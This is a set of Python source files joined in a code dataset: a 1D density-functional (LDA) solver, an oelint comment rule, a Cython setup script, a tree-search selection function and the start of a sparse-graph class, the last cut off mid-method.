r\"\"\"Calculates the Hartree potential for a given electron density.\n\n .. math::\n\n V_{\\mathrm{H}}(x) = \\int U(x,x') n(x') dx'\n\n parameters\n ----------\n pm : object\n Parameters object\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n\n returns array_like\n 1D array of the Hartree potential, indexed as v_h[space_index]\n \"\"\"\n v_h = np.dot(pm.space.v_int,density)*pm.space.delta\n\n return v_h\n\n\ndef hartree_energy(pm, v_h, density):\n r\"\"\"Calculates the Hartree energy of the ground-state system.\n\n .. math::\n\n E_{\\mathrm{H}}[n] = \\frac{1}{2} \\int \\int U(x,x') n(x) n(x') dx dx'\n = \\frac{1}{2} \\int V_{\\mathrm{H}}(x) n(x) dx\n\n parameters\n ----------\n pm : object\n Parameters object\n v_h : array_like\n 1D array of the ground-state Hartree potential, indexed as v_h[space_index]\n density : array_like\n 1D array of the ground-state electron density, indexed as density[space_index]\n\n returns float\n The Hartree energy of the ground-state system\n \"\"\"\n E_h = 0.5*np.dot(v_h,density)*pm.space.delta\n\n return E_h\n\n\ndef xc_energy(pm, n, separate=False):\n r\"\"\"LDA approximation for the exchange-correlation energy. Uses the LDAs developed in \n [Entwistle et al. 2018] from finite slab systems and the HEG.\n\n .. math ::\n\n E_{\\mathrm{xc}}^{\\mathrm{LDA}}[n] = \\int \\varepsilon_{\\mathrm{xc}}(n) n(x) dx\n\n parameters\n ----------\n pm : object\n Parameters object\n n : array_like\n 1D array of the electron density, indexed as n[space_index]\n separate: bool\n - True: Split the HEG exchange-correlation energy into separate exchange and correlation terms\n - False: Just return the exchange-correlation energy \n\n returns float\n Exchange-correlation energy\n \"\"\"\n NE = pm.lda.NE\n\n # Finite LDAs\n if NE != 'heg':\n p = LDA_parameters.exc_lda[NE]\n e_xc = (p['a'] + p['b']*n + p['c']*n**2 + p['d']*n**3 + p['e']*n**4 + p['f']*n**5)*n**p['g']\n \n # HEG LDA\n else:\n p = LDA_parameters.ex_lda[NE]\n q = LDA_parameters.ec_lda[NE]\n e_x = np.zeros(pm.space.npt, dtype=np.float)\n e_c = np.copy(e_x)\n for j in range(pm.space.npt):\n if(n[j] != 0.0):\n\n # Exchange energy per electron\n e_x[j] = (p['a'] + p['b']*n[j] + p['c']*n[j]**2 + p['d']*n[j]**3 + p['e']*n[j]**4 + p['f']*n[j]**5)*n[j]**p['g']\n\n # Correlation energy per electron\n r_s = 0.5/n[j]\n e_c[j] = -((q['a']*r_s + q['e']*r_s**2)/(1.0 + q['b']*r_s + q['c']*r_s**2 + q['d']*r_s**3))*np.log(1.0 + \\\n q['f']*r_s + q['g']*r_s**2)/q['f']\n\n # Exchange-correlation energy per electron\n e_xc = e_x + e_c\n\n # Exchange-correlation energy\n E_xc = np.dot(e_xc, n)*pm.space.delta\n\n # Separate exchange and correlation contributions\n if separate == True:\n E_x = np.dot(e_x, n)*pm.space.delta\n E_c = np.dot(e_c, n)*pm.space.delta\n return E_xc, E_x, E_c\n else:\n return E_xc\n\n\ndef xc_potential(pm, n, separate=False):\n r\"\"\"LDA approximation for the exchange-correlation potential. Uses the LDAs developed in \n [Entwistle et al. 2018] from finite slab systems and the HEG.\n\n .. math ::\n\n V_{\\mathrm{xc}}^{\\mathrm{LDA}}(x) = \\frac{\\delta E_{\\mathrm{xc}}^{\\mathrm{LDA}}[n]}{\\delta n(x)}\n = \\varepsilon_{\\mathrm{xc}}(n(x)) + n(x)\\frac{d\\varepsilon_{\\mathrm{xc}}}{dn} \\bigg|_{n(x)}\n\n parameters\n ----------\n pm : object\n Parameters object\n n : array_like\n 1D array of the electron density, indexed as n[space_index]\n separate: bool\n - True: Split the HEG exchange-correlation potential into separate exchange and correlation terms\n - False: Just return the exchange-correlation potential \n\n returns array_like\n 1D array of the exchange-correlation potential, indexed as v_xc[space_index]\n \"\"\"\n NE = pm.lda.NE\n\n # Finite LDAs\n if NE != 'heg':\n p = LDA_parameters.vxc_lda[NE]\n v_xc = (p['a'] + p['b']*n + p['c']*n**2 + p['d']*n**3 + p['e']*n**4 + p['f']*n**5)*n**p['g']\n\n # HEG LDA\n else:\n p = LDA_parameters.vx_lda[NE]\n q = LDA_parameters.ec_lda[NE]\n v_x = np.zeros(pm.space.npt, dtype=np.float)\n v_c = np.copy(v_x)\n for j in range(pm.space.npt):\n if n[j] != 0.0:\n\n # Exchange potential\n v_x[j] = (p['a'] + p['b']*n[j] + p['c']*n[j]**2 + \\\n p['d']*n[j]**3 + p['e']*n[j]**4 + \\\n p['f']*n[j]**5)*n[j]**p['g']\n\n # Correlation potential\n r_s = 0.5/n[j]\n energy = -((q['a']*r_s + q['e']*r_s**2)/(1.0 + q['b']*r_s + q['c']*r_s**2 + q['d']*r_s**3))*\\\n np.log(1.0 + q['f']*r_s + q['g']*r_s**2)/q['f']\n derivative = ((r_s*(q['a'] + q['e']*r_s)*(q['b'] + r_s*(2.0*q['c'] + 3.0*q['d']*r_s))*np.log(1.0 + \\\n q['f']*r_s + q['g']*(r_s**2)) - (r_s*(q['a'] + q['e']*r_s)*(q['f'] + 2.0*q['g']*r_s)*\\\n (q['b']*r_s + q['c']*(r_s**2) + q['d']*(r_s**3) + 1.0)/(q['f']*r_s + q['g']*(r_s**2) + \\\n 1.0)) - ((q['a'] + 2.0*q['e']*r_s)*(q['b']*r_s + q['c']*(r_s**2) + q['d']*(r_s**3) + 1.0)*\\\n np.log(1.0 + q['f']*r_s + q['g']*(r_s**2))))/(q['f']*(q['b']*r_s + q['c']*(r_s**2) + \\\n q['d']*(r_s**3) + 1.0)**2))\n\n v_c[j] = energy - r_s*derivative\n \n # Exchange-correlation potential\n v_xc = v_x + v_c\n\n if separate == True:\n return v_xc, v_x, v_c\n else:\n return v_xc\n\n\ndef DXC(pm, n): \n r\"\"\"Calculates the derivative of the exchange-correlation potential, necessary for the RPA \n preconditioner.\n\n parameters\n ----------\n pm : object\n Parameters object\n n : array_like\n 1D array of the electron density, indexed as n[space_index]\n\n returns array_like\n 1D array of the derivative of the exchange-correlation potential, indexed as D_xc[space_index]\n \"\"\"\n NE = pm.lda.NE\n\n # Currently only the finite LDAs can be used\n if NE != 'heg':\n p = LDA_parameters.dlda[NE]\n D_xc = (p['a'] + n*(p['b'] + n*(p['c'] + n*(p['d'] + n*(p['e'] + n*p['f'])))))*(n**p['g'])\n else: \n raise IOError(\"Currently the HEG LDA is not implemented for the RPA preconditioner.\")\n\n return D_xc \n\n\ndef total_energy_eigv(pm, eigenvalues, orbitals=None, density=None, v_h=None, v_xc=None):\n r\"\"\"Calculates the total energy from the Kohn-Sham eigenvalues.\n\n .. math ::\n\n E[n] = \\sum_{j=1}^{N} \\varepsilon_j + E_{xc}[n] - E_H[n] - \\int n(x) V_{xc}(x)dx\n\n parameters\n ----------\n pm : object\n Parameters object\n eigenvalues : array_like\n 1D array of the Kohn-Sham eigenvalues, indexed as eigenvalues[orbital_number]\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n v_h : array_like\n 1D array of the Hartree potential, indexed as v_h[space_index]\n v_xc : array_like\n 1D array of the exchange-correlation potential, indexed as v_xc[space_index]\n\n returns float\n Total energy\n \"\"\"\n # Quantities needed to calculate the total energy\n if density is None:\n if orbitals is None:\n raise ValueError(\"Need to specify either density or orbitals\")\n else:\n density = electron_density(pm, orbitals)\n if v_h is None:\n v_h = hartree_potential(pm, density)\n if v_xc is None:\n v_xc = xc_potential(pm, density)\n\n # Kohn-Sham eigenvalues\n E = 0.0\n for j in range(pm.sys.NE):\n E += eigenvalues[j]\n\n # Hartree Energy\n E -= hartree_energy(pm, v_h, density)\n\n # Exchange-correlation potential term\n E -= np.dot(density, v_xc)*pm.space.delta\n \n # Exchange-correlation energy\n E += xc_energy(pm, density)\n\n return E.real\n\n\ndef total_energy_eigf(pm, orbitals, density=None, v_h=None):\n r\"\"\"Calculates the total energy from the Kohn-Sham orbitals.\n\n .. math ::\n\n E[n] = \\sum_{j=1}^{N} \\langle \\phi_{j} | K | \\phi_{j} \\rangle + E_H[n] + E_{xc}[n] \n + \\int n(x) V_{\\mathrm{ext}}(x)dx\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n density : array_like\n 1D array of the electron density, indexed as density[space_index]\n v_h : array_like\n 1D array of the Hartree potential, indexed as v_h[space_index]\n\n returns float\n Total energy\n \"\"\"\n # Quantities needed to calculate the total energy\n if density is None:\n density = electron_density(pm, orbitals)\n if v_h is None:\n v_h = hartree_potential(pm, density)\n\n # Kinetic energy\n E = 0.0\n E += kinetic_energy(pm, orbitals)\n\n # Hartree energy\n E += hartree_energy(pm, v_h, density)\n\n # Exchange-correlation energy\n E += xc_energy(pm, density)\n\n # External potential term\n E += np.dot(pm.space.v_ext, density)*pm.space.delta\n\n return E.real\n\n\ndef kinetic_energy(pm, orbitals):\n r\"\"\"Calculates the kinetic energy from the Kohn-Sham orbitals.\n\n .. math ::\n\n T_{s}[n] = \\sum_{j=1}^{N} \\langle \\phi_{j} | K | \\phi_{j} \\rangle\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n\n \"\"\"\n # Kinetic energy matrix\n sd = pm.space.second_derivative\n sd_ind = pm.space.second_derivative_indices\n K = -0.5*sps.diags(sd, sd_ind, shape=(pm.space.npt, pm.space.npt), dtype=np.float, format='csr')\n\n # Kinetic energy of each occupied orbital\n occ = orbitals[:,:pm.sys.NE]\n eigenvalues = (occ.conj() * K.dot(occ)).sum(0)*pm.space.delta\n\n return np.sum(eigenvalues)\n\n\ndef calculate_current_density(pm, density):\n r\"\"\"Calculates the current density from the time-dependent electron density by solving the \n continuity equation.\n\n .. math:: \n\n \\frac{\\partial n}{\\partial t} + \\frac{\\partial j}{\\partial x} = 0\n\n parameters\n ----------\n pm : object\n Parameters object\n density : array_like\n 2D array of the time-dependent density, indexed as density[time_index,space_index]\n\n returns array_like\n 2D array of the current density, indexed as current_density[time_index,space_index]\n \"\"\"\n pm.sprint('', 1)\n string = 'LDA: calculating current density'\n pm.sprint(string, 1)\n current_density = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n for i in range(1, pm.sys.imax):\n string = 'LDA: t = {:.5f}'.format(i*pm.sys.deltat)\n pm.sprint(string, 1, newline=False)\n J = np.zeros(pm.space.npt, dtype=np.float)\n J = RE_cython.continuity_eqn(pm, density[i,:], density[i-1,:])\n current_density[i,:] = J[:]\n pm.sprint('', 1)\n\n return current_density\n\n\ndef crank_nicolson_step(pm, orbitals, H_full):\n r\"\"\"Solves Crank Nicolson Equation\n\n .. math::\n\n \\left(I + i\\frac{dt}{2} H\\right) \\Psi(x,t+dt) = \\left(I - i \\frac{dt}{2} H\\right) \\Psi(x,t)\n\n parameters\n ----------\n pm : object\n Parameters object\n orbitals : array_like\n 2D array of the Kohn-Sham orbitals, index as orbitals[space_index,orbital_number]\n H_full : array_like\n 2D array of the Hamiltonian matrix in full form, indexed as H_full[space_index,space_index]\n\n returns\n \"\"\"\n # Construct matrices\n dH = 0.5j*pm.sys.deltat*H_full\n identity = np.identity(pm.space.npt, dtype=np.cfloat)\n A = identity + dH\n Abar = identity - dH\n \n # Solve for all single-particle states at once\n RHS = np.dot(Abar, orbitals[:, :pm.sys.NE])\n orbitals_new = spla.solve(A, RHS)\n\n return orbitals_new\n\n\ndef main(parameters):\n r\"\"\"Performs LDA calculation\n\n parameters\n ----------\n parameters : object\n Parameters object\n\n returns object\n Results object\n \"\"\"\n # Array initialisations \n pm = parameters\n string = 'LDA: constructing arrays'\n pm.sprint(string, 1) \n pm.setup_space()\n\n # Take external potential as the initial guess to the Kohn-Sham potential\n H = hamiltonian(pm, v_ks=pm.space.v_ext)\n n_inp, orbitals, eigenvalues = groundstate(pm, H)\n E = total_energy_eigv(pm, eigenvalues=eigenvalues, density=n_inp)\n\n # Need n_inp and n_out to start mixing\n H = hamiltonian(pm, v_ks=ks_potential(pm, n_inp))\n n_out, orbitals_out, eigenvalues_out = groundstate(pm, H)\n\n # Mixing scheme\n if pm.lda.scf_type == 'pulay':\n mixer = mix.PulayMixer(pm, order=pm.lda.pulay_order, preconditioner=pm.lda.pulay_preconditioner)\n elif pm.lda.scf_type == 'cg':\n minimizer = minimize.CGMinimizer(pm, total_energy_eigf)\n elif pm.lda.scf_type == 'mixh':\n minimizer = minimize.DiagMinimizer(pm, total_energy_eigf)\n H_mix = copy.copy(H)\n\n # Find the self-consistent solution\n iteration = 1\n converged = False\n while (not converged) and iteration <= pm.lda.max_iter:\n E_old = E\n\n # Conjugate-gradient minimization starts with orbitals, H[orbitals]\n if pm.lda.scf_type == 'cg':\n\n orbitals = minimizer.step(orbitals, banded_to_full(pm, H))\n n_inp = electron_density(pm, orbitals)\n\n # Calculate total energy at n_inp\n E = total_energy_eigf(pm, orbitals=orbitals, density=n_inp)\n\n # Minimization that mixes Hamiltonian directly starts with n_inp, H[n_inp]\n elif pm.lda.scf_type == 'mixh':\n\n n_tmp, orbitals_tmp, eigenvalues_tmp = groundstate(pm,H_mix)\n H_tmp = hamiltonian(pm, v_ks=ks_potential(pm, n_tmp))\n\n H_mix = minimizer.h_step(H_mix, H_tmp)\n n_inp, orbitals_inp, eigenvalues_inp = groundstate(pm,H_mix)\n\n # Calculate total energy at n_inp\n E = total_energy_eigv(pm, eigenvalues=eigenvalues_inp, density=n_inp)\n\n # Mixing schemes starting with n_inp, n_out (Pulay, linear or none)\n else:\n\n # Calculate new n_inp\n if pm.lda.scf_type == 'pulay':\n n_inp = mixer.mix(n_inp, n_out, eigenvalues_out, orbitals_out.T)\n elif pm.lda.scf_type == 'linear':\n n_inp = (1-pm.lda.mix)*n_inp + pm.lda.mix*n_out\n else:\n n_inp = n_out\n\n # Calculate total energy at n_inp\n E = total_energy_eigv(pm, eigenvalues=eigenvalues_out, density=n_inp)\n\n # Calculate new Kohn-Sham potential and update the Hamiltonian\n v_ks = ks_potential(pm, n_inp)\n H = hamiltonian(pm, v_ks=v_ks)\n\n # Calculate new n_out\n n_out, orbitals_out, eigenvalues_out = groundstate(pm,H)\n\n # Calculate the Kohn-Sham gap\n gap = eigenvalues_out[pm.sys.NE]- eigenvalues_out[pm.sys.NE-1]\n if gap < 1e-3:\n string = \"\\nLDA: Warning: small KS gap {:.3e} Ha. Convergence may be slow.\".format(gap)\n pm.sprint(string, 1)\n\n # Calculate the self-consistent density and energy error\n dn = np.sum(np.abs(n_inp-n_out))*pm.space.delta\n dE = E - E_old\n\n # Check if converged\n converged = dn < pm.lda.tol and np.abs(dE) < pm.lda.etol\n string = 'LDA: E = {:.8f} Ha, de = {:+.3e}, dn = {:.3e}, iter = {}'.format(E, dE, dn, iteration)\n pm.sprint(string, 1, newline=False)\n\n # Iterate\n iteration += 1\n\n iteration -= 1\n pm.sprint('')\n\n # Print to screen\n if not converged:\n string = 'LDA: Warning: convergence not reached in {} iterations. Terminating.'.format(iteration)\n pm.sprint(string, 1)\n else:\n pm.sprint('LDA: reached convergence in {} iterations.'.format(iteration),0)\n\n # Self-consistent solution\n density = n_out\n orbitals = orbitals_out\n eigenvalues = eigenvalues_out\n \n # Calculate potentials and energies\n if pm.lda.NE == 'heg':\n E_xc, E_x, E_c = xc_energy(pm, density, separate=True)\n v_xc, v_x, v_c = xc_potential(pm, density, separate=True)\n else:\n E_xc = xc_energy(pm, density)\n v_xc = xc_potential(pm, density)\n v_h = hartree_potential(pm, density)\n v_ks = pm.space.v_ext + v_h + v_xc\n E = total_energy_eigf(pm, orbitals=orbitals, density=density)\n E_h = hartree_energy(pm, v_h, density)\n E_hxc = E_h + E_xc\n\n # Print to screen\n pm.sprint('LDA: ground-state energy: {}'.format(E),1)\n pm.sprint('LDA: ground-state Hartree exchange-correlation energy: {}'.format(E_hxc),1)\n pm.sprint('LDA: ground-state Hartree energy: {}'.format(E_h),1)\n pm.sprint('LDA: ground-state exchange-correlation energy: {}'.format(E_xc),1)\n if pm.lda.NE == 'heg':\n pm.sprint('LDA: ground-state exchange energy: {}'.format(E_x),1)\n pm.sprint('LDA: ground-state correlation energy: {}'.format(E_c),1)\n\n # Save the quantities to file\n results = rs.Results()\n results.add(density, 'gs_lda{}_den'.format(pm.lda.NE))\n results.add(v_h, 'gs_lda{}_vh'.format(pm.lda.NE))\n results.add(v_xc, 'gs_lda{}_vxc'.format(pm.lda.NE))\n results.add(v_ks, 'gs_lda{}_vks'.format(pm.lda.NE))\n results.add(E, 'gs_lda{}_E'.format(pm.lda.NE))\n results.add(E_xc, 'gs_lda{}_Exc'.format(pm.lda.NE))\n results.add(E_h, 'gs_lda{}_Eh'.format(pm.lda.NE))\n results.add(E_hxc, 'gs_lda{}_Ehxc'.format(pm.lda.NE))\n if pm.lda.NE == 'heg' :\n results.add(E_x, 'gs_lda{}_Ex'.format(pm.lda.NE))\n results.add(E_c, 'gs_lda{}_Ec'.format(pm.lda.NE))\n results.add(v_x, 'gs_lda{}_vx'.format(pm.lda.NE))\n results.add(v_c, 'gs_lda{}_vc'.format(pm.lda.NE))\n results.add(orbitals.T,'gs_lda{}_eigf'.format(pm.lda.NE))\n results.add(eigenvalues,'gs_lda{}_eigv'.format(pm.lda.NE))\n if pm.run.save:\n results.save(pm)\n\n # Propagate through real time\n if pm.run.time_dependence:\n\n # Construct arrays\n v_ks_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n v_xc_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n v_h_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n current = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n density_td = np.zeros((pm.sys.imax,pm.space.npt), dtype=np.float)\n orbitals = orbitals.astype(np.cfloat)\n\n # Save the ground-state\n v_ks_td[0,:] = v_ks[:]\n v_h_td[0,:] = v_h[:]\n v_xc_td[0,:] = v_xc[:]\n density_td[0,:] = density[:]\n\n # Perform real time iterations\n for i in range(1, pm.sys.imax):\n\n # Print to screen \n string = 'LDA: evolving through real time: t = {}'.format(i*pm.sys.deltat)\n pm.sprint(string, 1, newline=False)\n\n # Construct the Hamiltonian\n H = hamiltonian(pm, orbitals=orbitals, perturbation=True)\n H_full = banded_to_full(pm, H)\n\n # Propagate through time-step using the Crank-Nicolson method \n orbitals[:, :pm.sys.NE] = crank_nicolson_step(pm, orbitals, H_full)\n density_td[i,:] = electron_density(pm, orbitals)\n v_ks_td[i,:] = pm.space.v_ext[:] + pm.space.v_pert[:] + hartree_potential(pm, density_td[i,:]) + xc_potential(pm, density_td[i,:])\n\n # Hartree and exchange-correlation potential\n v_h_td[i,:] = hartree_potential(pm, density_td[i,:])\n v_xc_td[i,:] = xc_potential(pm, density_td[i,:])\n\n # Calculate the current density\n current_density = calculate_current_density(pm, density_td)\n \n # Save the quantities to file\n results.add(v_ks_td, 'td_lda{}_vks'.format(pm.lda.NE))\n results.add(v_h_td, 'td_lda{}_vh'.format(pm.lda.NE))\n results.add(v_xc_td, 'td_lda{}_vxc'.format(pm.lda.NE))\n results.add(density_td, 'td_lda{}_den'.format(pm.lda.NE))\n results.add(current_density, 'td_lda{}_cur'.format(pm.lda.NE))\n if pm.run.save:\n results.save(pm)\n\n pm.sprint('',1)\n\n return results\n","sub_path":"iDEA/LDA.py","file_name":"LDA.py","file_ext":"py","file_size_in_byte":27181,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"621025292","text":"from oelint_adv.cls_rule import Rule\n\n\nclass NoCommentsTrailing(Rule):\n def __init__(self):\n super().__init__(id=\"oelint.comments.notrailing\",\n severity=\"error\",\n message=\"Comments shall be put on seperate lines\")\n\n def check(self, _file, stash):\n res = []\n items = stash.GetItemsFor(filename=_file)\n for i in items:\n if i.Raw:\n for line in i.Raw.split(\"\\n\"):\n line = line.strip()\n if \"#\" in line and line.find(\"#\") > 0:\n res += self.finding(i.Origin, i.InFileLine)\n return res\n","sub_path":"oelint_adv/rule_base/rule_comment_notraling.py","file_name":"rule_comment_notraling.py","file_ext":"py","file_size_in_byte":654,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"281643395","text":"import numpy as np\nfrom distutils.core import setup\nfrom distutils.extension import Extension\nfrom Cython.Distutils import build_ext\n# from Cython.Build import cythonize\n\next_modules = [Extension(\n name=\"js_sc\",\n sources=[\"js_sc.pyx\", \"c_js_sc.cpp\"],\n # extra_objects=[\"fc.o\"], # if you compile fc.cpp separately\n include_dirs = [np.get_include()], # .../site-packages/numpy/core/include\n language=\"c++\",\n # libraries=\n # extra_compile_args = \"...\".split(),\n # extra_link_args = \"...\".split()\n )]\n\nsetup(\n name = 'js_sc',\n cmdclass = {'build_ext': build_ext},\n ext_modules = ext_modules,\n)\n\n","sub_path":"js_sc-setup.py","file_name":"js_sc-setup.py","file_ext":"py","file_size_in_byte":645,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"72687380","text":"from math import exp, sqrt, log, fabs\nfrom random import random, choice, seed, shuffle\n\n#from ParameterObject import depthscale\n#depthlimit = len(depthscale)+500000\n#========================================================\ndef UBEnergy(nodelist, exploreconstant, verbose):\n #Compute the average uniqueness factor\n uniqscore = [1.0 for x in nodelist]\n for i, node in enumerate(nodelist):\n visits = node.getvisits()\n score = node.getuniquenessdata(nodelist)\n uniqscore[i] = sqrt(visits/score)\n# uniqscore[0] = 0.0\n\n# maxval = max(uniqscore)\n# try:\n# uniqscore = [1.5*x/maxval for x in uniqscore]\n# except ZeroDivisionError:\n# uniqscore = [0.0 for node in nodelist]\n keylist = {}\n for i, node in enumerate(nodelist):\n keylist[str(node)] = uniqscore[i]\n\n selection = sorted(nodelist, key=lambda x:x.getid())\n selection = sorted(selection, key=lambda x:UCT_Unique_Score(x, keylist[str(x)], exploreconstant, doprint=True))[-1]\n print(\"Selecting Node %s with Score: %s\"%(selection.getid(), UCT_Unique_Score(selection, keylist[str(selection)], exploreconstant, doprint=True) ))\n return selection\n#==========================================================\n\ndef UCT_Unique_Score(node, uniqval, exploreconstant, doprint=False):\n \n parent = node.getparent()\n energy = node.getscore()\n visits = node.getvisits()\n# nChildren = len(node.getchildren())\n if parent is None:\n# return -1e30\n parenergy = node.getscore()\n parvisits = visits\n else:\n parenergy = parent.getscore()\n parvisits = parent.getvisits()\n\n\n depth = node.getdepth()\n# _, playoutEList = node.getplayouts()\n _, playoutEList = node.getallplayouts()\n# usedlist = node.getusedlist()\n# playoutEList = node.getenergylist()\n childeng = [child.getscore() for child in node.getnodelist()]\n nodeEnergy = node.getscore()\n nodeweight = nodeEnergy\n# scalefunc = lambda x: log(x, 10.0)\n# scalefunc = lambda x: sqrt(x)\n scalefunc = lambda x: x\n if visits < 10:\n exploitweight = scalefunc(nodeweight)\n else:\n exploitweight = 1e300\n cnt = 1\n# if len(childeng) > 0:\n# for energy in childeng:\n# exploitweight = min(exploitweight, scalefunc(energy))\n# exploitweight += energy\n# cnt += 1\n if len(playoutEList) > 0:\n for i, energy in enumerate(playoutEList):\n exploitweight = min(exploitweight, scalefunc(energy))\n# exploitweight += energy\n# cnt += 1\n exploitweight = exploitweight/cnt\n explore = 0.0\n try:\n explore = uniqval*sqrt(log(parvisits)/visits)\n except (ValueError, ZeroDivisionError):\n explore = uniqval\n\n score = -exploitweight + exploreconstant*explore\n if parent is not None:\n node.setexploitvalue(-exploitweight)\n node.setexplorevalue(explore)\n if depth > depthlimit or (parent is None):\n if doprint:\n try:\n print(\"Node %s (Parent:%s, Depth %s, Visits:%s): Exploit: %s Score:%s\"%(node.getid(), parent.getid(), depth, visits, -exploitweight, -1e20))\n except:\n print(\"Node %s (Parent:Head, Depth %s, Visits:%s): Exploit: %s Score:%s\"%(node.getid(), depth, visits, -exploitweight, -1e20))\n return -1e20\n\n\n if doprint:\n if parent is None:\n print(\"Node %s (Parent:%s, Depth:%s, Visits:%s): Exploit:%s Explore:%s Score:%s\"%(node.getid(), 'Head', depth, visits, -exploitweight, exploreconstant*explore, score))\n else:\n print(\"Node %s (Parent:%s, Depth:%s, Visits:%s): Exploit:%s Explore:%s Unique:%s Score:%s\"%(node.getid(), parent.getid(), depth, visits, -exploitweight, exploreconstant*explore, uniqval, score))\n return score\n\n\n\n#========================================================\n\n","sub_path":"SelectionRule.py","file_name":"SelectionRule.py","file_ext":"py","file_size_in_byte":3903,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"346762563","text":"#!/usr/bin/env python\n# -*- encoding: utf-8 -*-\n\nfrom typing import Optional, Dict, Tuple, Union, Set\nfrom copy import deepcopy\nfrom math import pow, sqrt\nimport time\nfrom threading import Lock\nimport networkx as nx\n\n\n# alias types\n#\nNodeType = str\n\"\"\" the type of a node \"\"\"\n\nNodeUid = str\n\"\"\" a node' unique identifier within the context of the node's type \"\"\"\n\nNodeId = Tuple[NodeType, NodeUid]\n\"\"\" the unique identifier of a node - the concatenation of its' type and uid\"\"\"\n\nNodeKey = str\n\"\"\" jason compliant unique identifier of a node used in hashes \"\"\"\n\nSourceId = NodeId\n\"\"\" unique identifier of the source node in a triple \"\"\"\n\nTargetId = NodeId\n\"\"\" unique identifier of the target node in a triple \"\"\"\n\nEdgeType = str\n\"\"\" the type of an edge \"\"\"\n\nEdgeUid = str\n\"\"\" an edge's unique identifier within the context of the edge's type \"\"\"\n\nEdgeExpired = float\n\"\"\" the timestamp when an edge has expired \"\"\"\n\nEdgeId = Tuple[EdgeType, Optional[EdgeUid], Optional[EdgeExpired]]\n\"\"\" the unique identifier of an edge withing the context of the edge type - a concatenation of Edge type, uid, expired timestamp\"\"\"\n\nTripleId = Tuple[SourceId, EdgeId, TargetId]\n\"\"\" the unique identifier of a triple source node, edge and target node \"\"\"\n\nTripleKey = str\n\"\"\" json compliant unique identifier of a triple used in hashes \"\"\"\n\nPor = dict\n\"\"\" dictionary representing the path of reasoning \"\"\"\n\n\ndef get_node_key(node_id: NodeId) -> NodeKey:\n # ':' special - enables easy splitting of keys to create ids\n #\n return f'{node_id[0]}:{node_id[1]}'\n\n\ndef get_node_id(node_key: NodeKey) -> NodeId:\n # assumes ':' delimits type and uid\n #\n node = node_key.split(':')\n return node[0], node[1]\n\n\ndef get_triple_key(triple_id: TripleId, directional: bool = False) -> TripleKey:\n source_key = get_node_key(node_id=triple_id[0])\n target_key = get_node_key(node_id=triple_id[2])\n\n # if not directional then key will consist of alphanumeric sort of source_key and target_key\n # note ':' special - delimits all components and allows for easy splitting to derive equivalent id\n #\n if (not directional and source_key < target_key) or directional:\n triple_key = f'{source_key}:{triple_id[1][0]}:{triple_id[1][1]}:{triple_id[1][2]}:{target_key}'\n else:\n triple_key = f'{target_key}:{triple_id[1][0]}:{triple_id[1][1]}:{triple_id[1][2]}:{source_key}'\n return triple_key\n\n\ndef get_triple_id(triple_key: TripleKey) -> TripleId:\n # assume special ':' character delimits components\n #\n triple = triple_key.split(':')\n\n # Note have to deal with converting string 'None' to type None\n #\n return (triple[0], triple[1]), (triple[2], triple[3] if triple[3] != 'None' else None, float(triple[4]) if triple[4] != 'None' else None), (triple[5], triple[6])\n\n\nclass AMGraph(object):\n \"\"\"\n class to represent a sparse graph of nodes connected by edges\n \"\"\"\n\n # class attribute representing next unique identifier for an instance of AMGraph\n # with associated thread lock\n #\n _next_uid = None\n _uid_lock = Lock()\n\n def __init__(self, uid: Optional[str] = None, graph=None, directional: bool = True, uid_copy: bool = True, normalised: bool = False):\n \"\"\"\n AMGraph represents an sparse graph of nodes connected via edges and capable of performing graph comparisons, learning and merging\n :param uid: optional unique identifier of a graph, if None then autogenerated\n :param graph: optional AMGraph or Dict that will be copied\n :param directional: Boolean flag indicating if edges are directional\n :param uid_copy: Boolean flag indicating if uid of supplied graph should be copied\n :param normalised: Boolean flag indicating edges of graph are normalised\n \"\"\"\n\n # the edges keyed by EdgeKey\n #\n self.edges: dict = {}\n\n # the nodes keyed by NodeKey\n #\n self.nodes: dict = {}\n\n self.directional = directional\n self.normalised = normalised\n\n # dict of NodeKeys with attributes that are graphs\n #\n self.embedded_graphs = {}\n\n self.edgeTypes = set()\n\n self.uid = None\n\n if graph is not None:\n if isinstance(graph, AMGraph):\n self.edges = deepcopy(graph.edges)\n self.nodes = deepcopy(graph.nodes)\n self.embedded_graphs = deepcopy(graph.embedded_graphs)\n self.normalised = graph.normalised\n self.directional = graph.directional\n self.edgeTypes = deepcopy(graph.edgeTypes)\n if uid_copy:\n self.uid = graph.uid\n\n elif isinstance(graph, dict):\n self.edges = deepcopy(graph['edges'])\n self.nodes = deepcopy(graph['nodes'])\n self.directional = graph['directional']\n self.embedded_graphs = deepcopy(graph['embedded_graphs'])\n self.normalised = graph['normalised']\n self.edgeTypes = deepcopy(graph['edgeTypes'])\n\n if uid_copy:\n self.uid = graph['uid']\n\n # reconstruct any embedded graphs\n #\n for node_key in self.embedded_graphs:\n for attr in self.embedded_graphs[node_key]:\n self.nodes[node_key][attr] = AMGraph(graph=self.nodes[node_key][attr])\n\n # set the uid if provided\n #\n if uid is not None:\n self.uid = uid\n\n # else if graph has not been provided to copy or copy_uid is not required\n #\n if self.uid is None:\n\n # if the class next_uid is None then start from 1\n #\n with AMGraph._uid_lock:\n\n # set to 1 if never been set before\n #\n if AMGraph._next_uid is None:\n AMGraph._next_uid = 1\n\n # create standard uid\n #\n self.uid = f'_graph_{AMGraph._next_uid}'\n\n # increment for next graphs\n #\n AMGraph._next_uid += 1\n\n def to_dict(self, denormaliser=None) -> 